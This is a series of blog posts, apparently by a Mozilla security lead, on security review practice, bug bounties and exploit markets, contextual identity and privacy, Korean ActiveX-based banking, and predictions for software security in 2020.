03
Aug 12

Meetings are for discussion, emails are for status

Just a short observation. I don’t think you should ever hold a meeting just read out status updates. If there isn’t time to meaningfully discuss the topics at hand, there’s no point in holding a meeting. Just send an email, blog it, post it to a wiki. But please, please don’t invite me to your meeting! Thanks!


14
Sep 11

Perceptions of risk

At Blackhat & Defcon recently I was once again surprised by the number of security professionals who refused to touch a networked device for the duration of the conference. Yes, the risk is elevated and people might have zero days. But the risk is also high in airports, coffee shops, and hotels in far-away places. People in some parts of the world live at a constantly high risk of zero-days in their own homes.

How can we be expected to help defend our users (who at most have a small fraction of the security knowledge that we do) in hostile environments if we can’t defend ourselves? Some have called this attitude cavalier or attributed it to hubris, but that’s missing the point.

The point is that either we are overestimating the risk at Blackhat, or underestimating the risk the rest of the time. If a security pro can’t defend themselves in a highly hostile environment, then I claim they can’t defend their users in a moderately hostile one.


12
Jun 11

Regarding your Baby

Having been at Mozilla for some time now, I’m still fascinated by the varying perceptions people have of security reviews. To some developers it feels like the Spanish Inquisition (minus the comfy pillows), while to others its an opportunity to uncover potential issues they may have missed during the design or implementation process. The interesting thing is that our approach is pretty much the same for every review.

But has become evident that we need to do a better job of defining and communicating both the structure and value of the process in a way the help each developer maximize the value of their reviews. Among those changes, we are going to try a more structured approach to how we run the meetings.

For a typical 60 minute design review, we will break up the time as follows:

Introduction by the feature team (5-10 minutes)

  1. Goal of the feature. What outcome is it trying to achieve: problems solved, uses cases enabled, etc.
  2. What solutions/approaches were considered
  3. Why was this solution chosen
  4. Any security threats or issues that were considered in the design

The purpose here is to help the security team understand the fundamental motivations and purpose of the feature, thereby setting the correct context for the rest of the conversation. If we don’t know why a feature is proposed, it becomes hard to justify (any) risk. That said, this is not the time to critique the feature. Comments and questions should be saved for later unless they directly relate to understanding the feature better.

Threat brainstorm (30-40 minutes)
A truly open brainstorming session on potential threats the feature could face or introduce. Like any good brainstorming it will involve some really interesting ideas as well as some really silly ones. The goal is not to make judgments during this phase; it is to test. Its vital for the feature team to participate in a critical analysis (in the classical sense) of their own feature.

Rather than feeling like they need to defend their feature, the feature team should strive to “swap sides” and think like an attacker. The value is to help teams understand how they can go through this questioning process themselves, but also realistically there are very few features we know enough about to go through this process w/o the feature team being represented. The ability to objectively critique one’s baby is a difficult but very valuable skill.

Conclusions and action items (10-20 minutes).
Summarize the threats uncovered and recommend and prioritize the mitigation to each. Identify parts of the feature necessary for followup security work, which may include detailed threat modeling, source code review, targeted fuzzing, etc.

Formal security reviews are not our only tool of course. In addition to our ongoing fuzzing and bug bounty programs–and the code review patches goes through anyway–we also use other approaches such as embedding security team members into the most complex projects. However that approach clearly does not scale to the nearly the number of projects we have. The best approach is often a series of small conversations. Lightweight interactions can be a great way to bounce ideas and get feedback, helping a team to crystallize specific aspects of a feature and prepare them for a detailed review in the future.

But the most important characteristic of any type of security interaction is that it happens as early as possible. The earlier we talk, the more options we have to address any significant shortcomings while still shipping what you want, when you want to. The later we talk, the smaller our toolbox becomes, eventually coming down to a single boolean lever: do we ship or not?


11
Jun 11

Choosing Security

Some of the most common reasons I hear from people for coming to Mozilla are “I want to have an impact”, “I want to work on things that matter” and “I want my work to touch lots of people”. Many of us have worked on projects independently and struggled to get anyone to notice, much less care.

Mozilla is a huge platform, a megaphone, for getting noticed. It is due to the trust in the Mozilla brand itself as well as direct access to hundreds of millions of users through our established products. As such its an incredibly appealing avenue to having the impact we desire.

However, with that great power comes great responsibility. Utilizing Mozilla’s brand and reach comes with the duty of ensuring that we are not putting our users at risk and undermining trust in our brand and existing products. That duty is reflected in additional scrutiny and reviews that you would not be subject to if you were doing something completely independently.

Our goal during each project lifecycle is trying to help each team have the impact they want. The best way to do so is to engage us early and often in your project, and listen to our feedback. We can help you understand the concerns and challenges you could face not just from Mozilla as an organization, but also from our users, web developers, website admins and the security community. Engaging us proactively maximizes your chances of shipping what you want, when you want to.

Conversely, ignoring recommendations, trying to delay or barrel through the review process or simply bypassing it entirely by releasing stuff through novel channels will likely end in an outcome very different from what you desire.

Please choose wisely!


07
Jun 11

The Uber-Fuzzer

A few weeks ago I had the chance to speak at a panel at the Hack in the Box conference in Amsterdam. For those of you not familiar with the Hack in the Box organization, its a great bunch of people who volunteer their time to put together a solid conference. The panel I was on discussed the “Economics of Vulnerabilities” and it focused primarily on the various ways organizations can recognize and compensate independent security researchers. It was a very interesting discussion, and I thank Katie Moussouris from Microsoft, Steve Adegbite from Adobe, Adrian Stone from RIM, Aaron Portnoy from ZDI and Chris Evans from Google for representing.

Since Mozilla has had a bounty program since 2004 (and Netscape started its bounty back in 1995) we obviously have some rather strong opinions about what works. :) Its been great seeing other software companies adopt various types of security bounty programs: Google (with great enthusiasm), Deutsche Post, Barracuda and others. The economics in our case are pretty straightforward: a researcher who submits to the Mozilla security bug bounty program gets a $3000 reward for every qualifying client bug they find, or between $500 and $3000 for each qualifying web bug. We are not buying a researcher’s silence however; we are offering a reward for constructive security research. There are no contracts or confidentiality clauses to sign. Of course, prompt payment and public attribution are also very important. :)

No discussion of vulnerability economics can ignore the grey elephant in the room: underground markets. Whether the color of those markets is black, grey or taupe, the fundamental objective of those buyers is to buy vulnerabilities to use as tools… implements… ok, weapons to achieve specific tactical or strategic objectives, rather than to fix those issues and protect all users. An interesting tidbit that came out during the discussion is that now researchers on those markets are being paid on an ongoing basis for as long as the vulnerability remains non-public and unfixed. This clearly is intended to minimize the odds the vendor will be able to discover and fix the issue. Something to keep in mind if you choose to go down that route.

The other thing to keep in mind with the underground markets is that they are paying for a fully reliable, weaponized exploit. In most cases this is an order of magnitude more work than simply finding a bug, and frankly something that very few researchers can actually achieve (per Aaron Portnoy of ZDI). At Mozilla we don’t need–or even want, honestly–a working exploit. We just need sufficient detail to understand and locate the bug. In most cases a simple test case demonstrating memory corruption or an assertion, or just referencing the offending lines of code is enough. Meaning a whole lot less hassle for the researcher.

This all has some rather profound implications for vendors. No longer can one expect that a zero-day will be monetized through rootkits that get sprayed across the internet, quickly alerting the vendor to the issue and allowing for a fix. Every incentive seems aligned to keep these bugs off the radar for as long as possible, meaning a quick response is no longer a sufficient primary strategy. Vendors must pursue a wide variety of means to find and fix all of those issues proactively, and not sit on bugs under the false hope that nobody else will find them. A bug bounty is a critical part of that strategy for Mozilla. It works for the same reason fuzzing works: it maximizes the potential set of inputs into the problem, greatly improving the chances of finding security bugs through unique and innovative means. Security bounty programs are the “uber-fuzzer”.


16
Jul 10

Contextual Identity

We’ve been thinking and discussing, and then thinking some more, about both privacy and identity at Mozilla. So far we have generally been treating them as two separate sets of issues, but I’m beginning to wonder if there might be another way to think about this.

People have been trying various ways of addressing privacy concerns on the web. These approaches have generally consisted of mechanisms to permit a website and/or user to define and communicate a privacy policy in some digestible way, and then optionally negotiate some happy middle ground (or not). P3P was probably the most ambitious attempt to crack this nut, without much success. I won’t try to rehash these various proposals here nor speculate as to why each has so far largely failed.

Instead, lets try a different tack. What if privacy is really just an aspect of identity?

One hypothesis: people don’t have a single identity… in the real world, or online. Who you fundamentally represent yourself to be (in terms of name, accuracy of location, age, social-demographics, etc.) varies depending on the context. This is true whether you are interacting online with a bank vs. an online hobby forum vs. craigslist, and true whether you are interacting with your close family vs. coworkers vs. random strangers in the elevator.

In each of those scenarios, you are projecting a different “view” of your underlying self that you feel is appropriate for the given context. Even in situations of relatively equal trust and confidence, say with your parents vs. your significant other, you are sharing information on a fundamentally different basis in terms of how you are presenting it, how you want to be perceived and how much detail and honesty you are willing to provide, even when the topic is the same. In Plato’s Cave, we are putting on a unique shadow play for each audience. I’m sure there is a formal academic definition of this, but lacking that at the moment I’ll just call this the “contextual identity”.

The desire to be perceived in a certain way inherently includes a set of privacy expectations, or put another way, an individual’s implicit privacy policy in a given context. This is often where people run into privacy problems online, where either their expectation of their identity in a given context is not accurate (i.e. they are sharing way more, or very different types of, information than they desired to), or they are sharing it in a different context (i.e. embarrassing party photos are viewed by a potential employer).

So maybe its not a surprise that many social networks have ended up with privacy egg in their face. Part of the problem is that by presuming that users should have only a single, canonical identity on their network (and indeed, often the entire web), they lack the flexibility for individuals to express their various identities appropriately in different contexts.

So what if you could in fact maintain a set of identities, each reflecting accurately your desired identity in a given context? Then you could seamlessly interact with a wide range of services, from commenting on news sites in a relatively anonymous setting, to sharing health information with your family or doing online backing, each relatively confidential and trustworthy things, yet still fundamentally different. After all, your family shouldn’t necessarily know your current bank balance and conversely, your bank doesn’t need to know about your health.

Who would you trust with managing this set of identities, though? Your favorite social network? The problem with that is this trusted provider would need to be aware of the superset of your desired identities, which likely includes identities that are more sensitive than you’d be willing to share with said networks. Given social networks are relatively low in the grand heirarchy of trust (for me, anyway), they seem like poor receptacles for this degree of trust.

The best entity to trust with this information is, oddly enough, yourself. The ideal solution would be locally managed on the user’s system, but securely synchronized seamlessly to your devices. This model has some important positive characteristics.

For one, the entity atop of this hierarchy of trust is: you. Obviously you also need to trust the software you use, but that is the tremendous power of open source software. Since you can inspect the source code and build your own version of any open source package, you can actually trust its behavior. Something that is only possible for closed-source locally-installed software with immense skill and effort in reverse engineering… and mostly impossible for remotely hosted web apps.

The other reason is that because you control all these disparate identities, you can choose which of them can be associated with each other, and under what context. For example, I might be OK with my social network identity to be associated with my blogging identity, but I probably don’t want either to be aware of any of my banking identities.

Sounds great, right? Maybe… or maybe not. Either way, let me know! So what’s next, you ask?

Hmm, we’ll see. Stay tuned… :)


09
May 10

Korea: 1995 -> 2010

Last week I had the opportunity to travel to Korea to speak at a short conference regarding the unique Korean authentication requirements for banks and e-commerce. The rules originated in the mid 90′s, in response to a perceived lack of finalized standards around SSL and US crypto export restrictions. It mandated the use of the proprietary 128bit cypher SEED (http://en.wikipedia.org/wiki/SEED) implemented in the form of plugins and ActiveX controls, along with client certificates for authentication.

Today this has resulted in a system that largely ignores HTTPS and relies on user authentication, channel encryption and transaction signing via proprietary ActiveX controls (plugins equivalents fell out of favor after Netscape lost the browser war, though there has been some increasing interest in them lately). This model implies some serious usability issues, namely that users are reduced to Windows and IE as the only viable platform for serious web browsing. Not just IE, but often older versions of IE since many of these ActiveX controls don’t support newer versions of IE and Windows. The irony is that one of the most technologically advanced free societies is forced to use the worst possible browser from a general usability and security standpoint. Mobile devices generally also don’t support this model either, although banks are now starting to build dedicated apps for more popular devices.

This also has some unfortunate security implications. While the model may have seemed reasonable given the crypto restrictions and threat models of the mid-90s, and even advanced in many respects, the end result of its struggle to keep up with the evolving web threat model has been an odd Rube Goldberg-esqe system of part time anti-malware, anti-keylogging, and excessive faith in the strength of client certificates as a non-repudiation mechanism.

The reality of the model is that, since the HTML interface is delivered over HTTP, any man-in-the-middle (MITM) attacker can inject their own HTML or JavaScript into the content, to then display their own dialogs to the user, prompt to install a malicious ActiveX control or prevent the intended ones from running. Or just hang out quietly and steal any information the user sees via HTML, which includes information like bank accounts, balances, transaction history, etc. The user has no way of detecting that this has happened, nor can they do anything to prevent it.

The recent Korean launch and popularity of foreign mobile devices has driven a lot of interest in alternative browsers and platforms, and it turns out that the Korean people are already well aware of the usability and choice penalties imposed by the current model. So my talk focused primarily on the security shortcomings of the current model, and especially entire parts of the threat model that are not being addressed, such as content integrity and confidentiality.

The subsequent coverage was quite positive, though the only English-language article I’m aware of is here: http://www.koreatimes.co.kr/www/news/biz/2010/04/123_65102.html

My presentation is available here: https://wiki.mozilla.org/images/6/61/Korea.pdf
Also presented was a paper by two young researchers from Oxford, that goes into more technical detail: http://www.comlab.ox.ac.uk/publications/publication3442-abstract.html

For some excellent background on this topic, check out:
Gen Kanai’s blog – http://blog.mozilla.org/gen/category/korea/
Channy Yun’s article – http://webstandards.or.kr/2007/03/17/korean-home-brew-on-the-web/


22
Jan 10

Evolution of Software Security – Predictions for 2020

Attackers will become increasingly more efficient at discovering & exploiting vulnerabilities, even as application developers continue to try to reduce the attack surface. This has several implications:

  • Attackers will depend less on random manual testing to find vulnerabilities.  Instead, attackers will find new and lazy yet creative ways of discovering vulnerabilities such as mining public crash reports, bug repos and other public sources of information for clues to potential issues, spearphishing of developers, corporations and other individuals with sensitive security information (to steal security bug information or gain/elevate access privileges to source code) and utilizing off the shelf security software to analyze potential targets.  Call it laziness; I call it efficiency.
  • Attackers will be come increasingly more efficient at deploying exploits, putting serious pressure on software vendors to compress release and update cycles.  You are already seeing the acceptable window of updates shrinking from 30 days or more down to 24 hours, but that will come under severe pressure.  By 2020 I expect acceptable update windows will be measured in an hour or two, and likely even minutes for high profile target applications.
  • Focus away from bug counting as a useful metric, towards actual exposure risk.  Something like number of open security bugs multiplied by average window of time from bug discovery to when the fix has been deployed to 80% of the user base (just a hypothetical example, the real metrics will likely be more complicated).  This would require vendors to agree on common metrics and severity ratings, and become far more transparent and willing to share more information than they have been thus far, so perhaps its not a particularly realistic prediction. :)
  • Software companies will hopefully become more effective at putting security into context with other business objectives.  While this seems like an obvious thing to do, too many companies treat security as practically an aspect of PR, rather than serious engineering work that requires tradeoffs in other areas of product development.
  • Valuable information will continue migrating up the stack; so will valuable exploits.  Much has been made of process isolation / sandboxing technologies, and they do help.  However, increasingly as more critical information is stored on the web than local systems, exploits that are executed with just “content” privileges (i.e. the context they run within has access to network and credentials/cookies but not filesystems or other critical OS resources) will be considered “good enough.”  Expect to see more investment in exploit frameworks that focus on weaponizing information-stealing exploits that run within limited privilege processes.
  • Fuzzing will becoming an increasingly commoditized technology & skill-set, so software vendors should not become complacent and assume technical superiority.
  • Software companies that rely on “checklist security” processes and talking heads rather than deep technical security competence will suffer terribly as the sophistication of attackers ramps up, and their internal processes and teams cannot keep pace.
  • Deployment of exploits will become sophisticated to the point attackers that will have a quiver of exploits that they will selectively deploy against specific application versions, only serving them against high-value targets.   This means software vendors need to fix issues quickly, as they cannot afford to sit on bugs they know about as the first indication that they have been externally discovered will likely be when they are used in a high-profile, targeted attack.
  • This will increase the value of zero day exploits, as they provide first-mover advantage against sophisticated and well-defended targets. These exploits will rarely be wasted on the more common, “shotgun” exploit economy out there that shoots at anything that moves (for purposes of building botnets for fun and profit, stealing email and WoW accounts, individual bank accounts, etc).  That latter “exploit mass market” will focus increasingly on high volume exploitation of known issues in applications and platforms with slow update uptake rates, while niche players will focus on zero days for international and corporate espionage.

The above pontifications are purely my own opinions and are likely neither representative of nor shared by others.